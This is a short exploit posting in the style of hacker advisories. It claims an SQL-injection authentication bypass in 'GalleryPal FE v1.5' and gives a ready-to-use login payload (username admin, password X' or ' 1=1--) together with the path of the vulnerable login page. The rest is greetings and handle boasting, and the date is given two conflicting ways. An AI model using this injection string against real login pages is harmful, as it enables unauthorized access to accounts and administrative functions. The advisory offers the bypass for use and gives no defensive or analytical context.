GalleryPal FE v1.5(Auth Bypass) :

Date : 2009-12-15 Author : R3d-D3v!L
------------------------------------------------------------
[~] GalleryPal FE v1.5(Auth Bypass)

[~]TYPE:Remote SQL Injection Vulnerability

[~] ----------------------------------------------------------

[~] author: R3d-D3v!L

[~]

[~] Date: 15.11.2008

[~]

[~] Home: www.ahacker.net

[~]

[~] contact: N/A

[~]

[~] -----------------------------------------------------------


ALERT FR0M THE DARKNESS BY 7h3 REd-D3v!L

[~] Exploit:



[*] username : admin


[*] password : X' or ' 1=1--

[*] demo:

[*] server/GalleryPal_FE_Demo/login.asp



[~] spechial thanks : ((dolly)) & ((7am3m)) & ((magoush_1987)) & (DEV!L_MODE) & ((0R45hy)) & {0}-{n-c-A}-{0}

[~]

[?] 4.!.S ---> ((R3d D?v!L))--JuPA--M2Z --d3v!L-Ro07

[~]

[~] www.xp10.me

[~]

[~]I4M:4r48!4N-3XPLO!73r

C1

 

C2

 

C3